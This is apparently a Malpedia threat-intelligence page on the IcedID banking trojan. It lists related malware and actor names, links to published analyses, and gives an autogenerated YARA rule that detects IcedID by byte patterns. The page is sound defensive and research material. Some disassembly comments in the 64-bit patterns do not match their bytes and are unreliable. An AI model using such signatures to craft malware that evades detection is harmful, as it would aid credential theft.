MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelDridex DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot Vidar Winnti ANTHROPOID SPIDER APT23 APT31 APT39 APT40 BlackTech BuhTrap Charming Kitten CLOCKWORK SPIDER DOPPEL SPIDER FIN7 Gamaredon Group GOBLIN PANDA MONTY SPIDER MUSTANG PANDA NARWHAL SPIDER NOCTURNAL SPIDER PINCHY SPIDER SALTY SPIDER SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER VICEROY TIGER

2020-02-18 ⋅ Sophos Labs ⋅ Luca Nagy
Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot

2020-01-22 ⋅ Thomas Barabosch
The malware analyst’s guide to PE timestamps
Azorult Gozi IcedID ISFB LOLSnif SUNBURST TEARDROP

2020 ⋅ Secureworks ⋅ SecureWorks
GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot LUNAR SPIDER

2019-12-18 ⋅ Github (psrok1) ⋅ Paweł Srokosz
IcedID PNG Extractor
IcedID

2019-12-12 ⋅ FireEye ⋅ Chi-en Shen, Oleg Bondarenko
Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech

2019-12-03 ⋅ Malwarebytes ⋅ Threat Intelligence Team
New version of IcedID Trojan uses steganographic payloads
IcedID

2019-07-09 ⋅ Fortinet ⋅ Kai Lu
A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID

2019-06-25 ⋅ Dawid Golak
IcedID aka #Bokbot Analysis with Ghidra
IcedID

2019-06-16 ⋅ Fortinet ⋅ Kai Lu
A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID

2019-04-04 ⋅ SecurityIntelligence ⋅ Nir Somech, Limor Kessem
IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID

2019-03-21 ⋅ CrowdStrike ⋅ Shaun Hurley, James Scalise
Interception: Dissecting BokBot’s “Man in the Browser”
IcedID

2019-02-15 ⋅ CrowdStrike ⋅ Brendon Feeley, Bex Hartley
“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak LUNAR SPIDER WIZARD SPIDER

2019-02-06 ⋅ SecurityIntelligence ⋅ Itzik Chimino, Limor Kessem, Ophir Harpaz
IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID

2019-01-03 ⋅ CrowdStrike ⋅ Shaun Hurley, James Scalise
Digging into BokBot’s Core Module
IcedID

2018-11-09 ⋅ Youtube (OALabs) ⋅ Sean Wilson, Sergei Frankoff
Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID

2018-10-26 ⋅ Youtube (OALabs) ⋅ Sergei Frankoff
Unpacking Bokbot / IcedID Malware - Part 1
IcedID

2018-09-07 ⋅ Vitali Kremez
Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID

2018-08-09 ⋅ Fox-IT ⋅ Alfred Klason
Bokbot: The (re)birth of a banker
IcedID Vawtrak

2018-04-10 ⋅ Cisco Talos ⋅ Ross Gibb, Daphne Galme, Michael Gorelik
IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID

2017-11-14 ⋅ Digital Guardian ⋅ Chris Brook
IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID

2017-11-13 ⋅ Intezer ⋅ Jay Rosenberg
IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader

2017-11-13 ⋅ SecurityIntelligence ⋅ Limor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader

Yara Rules

[TLP:WHITE] win_icedid_auto (20230808 | Detects win.icedid.)

rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2023-12-06"
        version = "1"
        description = "Detects win.icedid."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_rule_date = "20231130"
        malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
        malpedia_version = "20230808"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { 85c0 7511 56 57 ff15???????? }
            // n = 5, score = 1300
            //   85c0                 | test                eax, eax
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi
            //   ff15????????         |                     

        $sequence_1 = { 50 6801000080 ff15???????? eb13 }
            // n = 4, score = 1300
            //   50                   | push                eax
            //   6801000080           | push                0x80000001
            //   ff15????????         |                     
            //   eb13                 | jmp                 0x15

        $sequence_2 = { 803e00 7427 6a3b 56 ff15???????? 8bf8 }
            // n = 6, score = 1300
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax

        $sequence_3 = { ff15???????? 85c0 7420 837c241000 7419 }
            // n = 5, score = 1300
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7420                 | je                  0x22
            //   837c241000           | cmp                 dword ptr [esp + 0x10], 0
            //   7419                 | je                  0x1b

        $sequence_4 = { 56 ff15???????? 8bf8 85ff 7418 c60700 }
            // n = 6, score = 1300
            //   56                   | push                esi
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax
            //   85ff                 | test                edi, edi
            //   7418                 | je                  0x1a
            //   c60700               | mov                 byte ptr [edi], 0

        $sequence_5 = { 68???????? 6a00 ff15???????? 33c0 40 }
            // n = 5, score = 1300
            //   68????????           |                     
            //   6a00                 | push                0
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
            //   40                   | inc                 eax

        $sequence_6 = { 50 ff15???????? 8bf7 8bc6 eb02 }
            // n = 5, score = 1300
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4

        $sequence_7 = { eb0f 6a08 ff15???????? 50 ff15???????? 8906 }
            // n = 6, score = 1300
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8906                 | mov                 dword ptr [esi], eax

        $sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 6, score = 1000
            //   e8????????           |                     
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_9 = { 743f 8d5808 0fb713 8954241c }
            // n = 4, score = 800
            //   743f                 | je                  0x41
            //   8d5808               | lea                 ebx, [eax + 8]
            //   0fb713               | movzx               edx, word ptr [ebx]
            //   8954241c             | mov                 dword ptr [esp + 0x1c], edx

        $sequence_10 = { 03c2 eb5c 8d5004 89542414 8b12 85d2 }
            // n = 6, score = 800
            //   03c2                 | add                 eax, edx
            //   eb5c                 | jmp                 0x5e
            //   8d5004               | lea                 edx, [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx

        $sequence_11 = { 66c16c241c0c 0fb7d2 c744241000100000 663b542410 }
            // n = 4, score = 800
            //   66c16c241c0c         | shr                 word ptr [esp + 0x1c], 0xc
            //   0fb7d2               | movzx               edx, dx
            //   c744241000100000     | mov                 dword ptr [esp + 0x10], 0x1000
            //   663b542410           | cmp                 dx, word ptr [esp + 0x10]

        $sequence_12 = { 47 83c302 3bfd 72c4 }
            // n = 4, score = 800
            //   47                   | inc                 edi
            //   83c302               | add                 ebx, 2
            //   3bfd                 | cmp                 edi, ebp
            //   72c4                 | jb                  0xffffffc6

        $sequence_13 = { 8d4508 50 0fb6440b34 50 }
            // n = 4, score = 800
            //   8d4508               | lea                 eax, [ebp + 8]
            //   50                   | push                eax
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax

        $sequence_14 = { 89542414 8b12 85d2 7454 8d6af8 d1ed }
            // n = 6, score = 800
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56
            //   8d6af8               | lea                 ebp, [edx - 8]
            //   d1ed                 | shr                 ebp, 1

        $sequence_15 = { 47 3b7820 72d1 5b 33c0 40 }
            // n = 6, score = 800
            //   47                   | inc                 edi
            //   3b7820               | cmp                 edi, dword ptr [eax + 0x20]
            //   72d1                 | jb                  0xffffffd3
            //   5b                   | pop                 ebx
            //   33c0                 | xor                 eax, eax
            //   40                   | inc                 eax

        $sequence_16 = { ff5010 85c0 7407 33c0 e9???????? }
            // n = 5, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax
            //   e9????????           |                     

        $sequence_17 = { 8a4173 a808 75f5 a804 7406 }
            // n = 5, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8

        $sequence_18 = { ff15???????? 85c0 750a b8010000c0 }
            // n = 4, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001

        $sequence_19 = { 41 02fd c6430503 eb21 41 0fb6c1 }
            // n = 6, score = 200
            //   41                   | inc                 ecx
            //   02fd                 | add                 bh, ch
            //   c6430503             | mov                 byte ptr [ebx + 5], 3
            //   eb21                 | jmp                 0x23
            //   41                   | inc                 ecx
            //   0fb6c1               | movzx               eax, cl

        $sequence_20 = { 48 8bfa 48 8bf1 45 8d41ce e8???????? }
            // n = 7, score = 200
            //   48                   | dec                 eax
            //   8bfa                 | mov                 edi, edx
            //   48                   | dec                 eax
            //   8bf1                 | mov                 esi, ecx
            //   45                   | inc                 ebp
            //   8d41ce               | lea                 eax, [ecx - 0x32]
            //   e8????????           |                     

        $sequence_21 = { 7407 41 2bcd 7515 eb0f 44 }
            // n = 6, score = 200
            //   7407                 | je                  9
            //   41                   | inc                 ecx
            //   2bcd                 | sub                 ecx, ebp
            //   7515                 | jne                 0x17
            //   eb0f                 | jmp                 0x11
            //   44                   | inc                 esp

        $sequence_22 = { 48 8d442458 48 8bf9 48 }
            // n = 5, score = 200
            //   48                   | dec                 eax
            //   8d442458             | lea                 eax, [esp + 0x58]
            //   48                   | dec                 eax
            //   8bf9                 | mov                 edi, ecx
            //   48                   | dec                 eax

        $sequence_23 = { 8bce 894348 48 8b15???????? }
            // n = 4, score = 200
            //   8bce                 | mov                 ecx, esi
            //   894348               | mov                 dword ptr [ebx + 0x48], eax
            //   48                   | dec                 eax
            //   8b15????????         |                     

        $sequence_24 = { 7307 4c8b742420 eba1 488bb590020000 }
            // n = 4, score = 100
            //   7307                 | mov                 ecx, eax
            //   4c8b742420           | dec                 eax
            //   eba1                 | mov                 esi, dword ptr [ebp + 0x290]
            //   488bb590020000       | dec                 eax

        $sequence_25 = { 57 4883ec30 488bf2 488bd9 ff15???????? 4885c0 }
            // n = 6, score = 100
            //   57                   | dec                 ebp
            //   4883ec30             | mov                 esi, eax
            //   488bf2               | dec                 eax
            //   488bd9               | and                 dword ptr [eax - 0x28], edi
            //   ff15????????         |                     
            //   4885c0               | dec                 esp

        $sequence_26 = { 7409 8b4c2478 493b0e 741e 498b1f 4885db }
            // n = 6, score = 100
            //   7409                 | je                  0xb
            //   8b4c2478             | mov                 ecx, dword ptr [esp + 0x78]
            //   493b0e               | dec                 ecx
            //   741e                 | cmp                 ecx, dword ptr [esi]
            //   498b1f               | je                  0x20
            //   4885db               | dec                 ecx

        $sequence_27 = { 33d2 488bc8 ff15???????? 488bb590020000 4885f6 7414 ff15???????? }
            // n = 7, score = 100
            //   33d2                 | mov                 ebx, dword ptr [edi]
            //   488bc8               | dec                 eax
            //   ff15????????         |                     
            //   488bb590020000       | test                ebx, ebx
            //   4885f6               | xor                 edx, edx
            //   7414                 | dec                 eax
            //   ff15????????         |                     

        $sequence_28 = { 33d2 488bce ff15???????? 8bd8 49891e 85c0 }
            // n = 6, score = 100
            //   33d2                 | mov                 esi, eax
            //   488bce               | dec                 eax
            //   ff15????????         |                     
            //   8bd8                 | cmp                 eax, -1
            //   49891e               | jne                 0x10
            //   85c0                 | push                edi

        $sequence_29 = { 4533c0 c740c803000000 ba00000080 ff15???????? 488bf0 4883f8ff 7507 }
            // n = 7, score = 100
            //   4533c0               | mov                 esi, dword ptr [ebp + 0x290]
            //   c740c803000000       | pop                 ebp
            //   ba00000080           | ret                 
            //   ff15????????         |                     
            //   488bf0               | dec                 eax
            //   4883f8ff             | lea                 eax, [0x1e0d]
            //   7507                 | xor                 edi, edi

        $sequence_30 = { 33ff 4d8bf0 482178d8 4c8bfa }
            // n = 4, score = 100
            //   33ff                 | dec                 esp
            //   4d8bf0               | mov                 esi, dword ptr [esp + 0x20]
            //   482178d8             | jmp                 0xffffffaa
            //   4c8bfa               | dec                 eax

        $sequence_31 = { 5d c3 488b0d???????? 488d050d1e0000 }
            // n = 4, score = 100
            //   5d                   | test                esi, esi
            //   c3                   | je                  0x16
            //   488b0d????????       |                     
            //   488d050d1e0000       | jae                 9

    condition:
        7 of them and filesize < 303104
}

Download all Yara Rules

IcedID Propose Change

References

Yara Rules

IcedID